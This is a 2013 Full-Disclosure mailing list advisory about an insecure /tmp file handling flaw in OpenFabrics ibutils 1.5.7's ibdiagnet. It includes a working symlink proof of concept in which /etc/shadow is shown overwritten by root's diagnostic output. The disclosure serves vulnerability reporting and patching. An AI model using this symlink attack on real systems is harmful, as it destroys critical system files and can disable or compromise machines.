[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] OpenFabrics ibutils 1.5.7 /tmp clobbering vulnerability
- To: full <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] OpenFabrics ibutils 1.5.7 /tmp clobbering vulnerability
- From: "Larry W. Cashdollar" <larry0@xxxxxx>
- Date: Wed, 06 Mar 2013 18:35:14 +0000 (GMT)
<html><body><div><h2>OpenFabrics ibutils 1.5.7 /tmp clobbering vulnerability
</h2>
<hr>
<p>3/6/2013<br>
Larry W. Cashdollar<br>
@_larry0
</p>
<p>The infiniband diagnostic utiltiy handles files in /tmp insecurely. A
malicious user
can clobber root owned files with common symlink attacks.
</p>
<p><a
href="http://www.openfabrics.org/downloads/ibutils/";>http://www.openfabrics.org/downloads/ibutils/</a>
</p>
<p>[nobody@exdb01 tmp]$ ln -s /etc/shadow ibdiagnet.log <br>
[nobody@exdb01 tmp]$ ls -l ibdiagnet.log
lrwxrwxrwx 1 nobody users 11 Mar 6 18:19 ibdiagnet.log -> /etc/shadow
[nobody@exdb01 tmp]$
</p>
The following files are created, I imagine anyone of them can be used.
<p>[root@exdb01 tmp]# ls -l /tmp/ibdiagnet*
-rw-r--r-- 1 root root 57611 Mar 6 18:20 /tmp/ibdiagnet.db
-rw-r--r-- 1 root root 830 Mar 6 18:20 /tmp/ibdiagnet.fdbs
-rw-r--r-- 1 root root 5805 Mar 6 18:20 /tmp/ibdiagnet_ibis.log
-rw-r--r-- 1 root root 2359 Mar 6 18:20 /tmp/ibdiagnet.log
-rw-r--r-- 1 root root 7072 Mar 6 18:20 /tmp/ibdiagnet.lst
-rw-r--r-- 1 root root 456 Mar 6 18:20 /tmp/ibdiagnet.mcfdbs
-rw-r--r-- 1 root root 784 Mar 6 18:20 /tmp/ibdiagnet.pkey
-rw-r--r-- 1 root root 3348 Mar 6 18:20 /tmp/ibdiagnet.psl
-rw-r--r-- 1 root root 179228 Mar 6 18:20 /tmp/ibdiagnet.slvl
-rw-r--r-- 1 root root 193 Mar 6 18:20 /tmp/ibdiagnet.sm
</p>
After root runs a diagnostic command:
<p>[root@exdb01 tmp]# ibdiagnet -ls 10 -lw 4x -vlr
Loading IBDIAGNET from: /usr/lib64/ibdiagnet1.5.7
-W- Topology file is not specified.
</p><p> Reports regarding cluster links will use direct routes.
Loading IBDM from: /usr/lib64/ibdm1.5.7
-W- A few ports of local device are up.
</p><p> Since port-num was not specified (-p option), port 1 of device 1
will be
used as the local port.<br>
-I- Discovering ... 7 nodes (2 Switches & 5 CA-s) discovered.
.<br>
.<br>
.<br>
.
</p>
<p> Extracting SL Based Routing Info 0 0
</p>
Please see /tmp/ibdiagnet.log for complete log
<p>-I- Done. Run time was 2 seconds.
</p>
Symlinked files are overwritten:
<p>[root@exdb01 tmp] ls -l /etc/shadow<br>
-rw------- 1 root root 2359 Mar 6 18:17 /etc/shadow
[root@exdb01 tmp] head /etc/shadow<br>
-W- Topology file is not specified.
</p><p> Reports regarding cluster links will use direct routes.
-W- A few ports of local device are up.
</p><p> Since port-num was not specified (-p option), port 1 of device 1
will be
used as the local port.<br>
-I- Discovering ... 7 nodes (2 Switches & 5 CA-s) discovered.
</p>
<p>-I---------------------------------------------------
-I- Bad Guids/LIDs Info
</p><h4>
Versions installed</h4>
<p>[root@exdb01 tmp] rpm -aq |grep ibutils
ibutils-1.5.7-1.el5<br>
ibutils-libs-1.5.7-1.el5<br>
ibutils-devel-1.5.7-1.el5<br>
[root@exdb01 tmp]
</p></div></body></html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/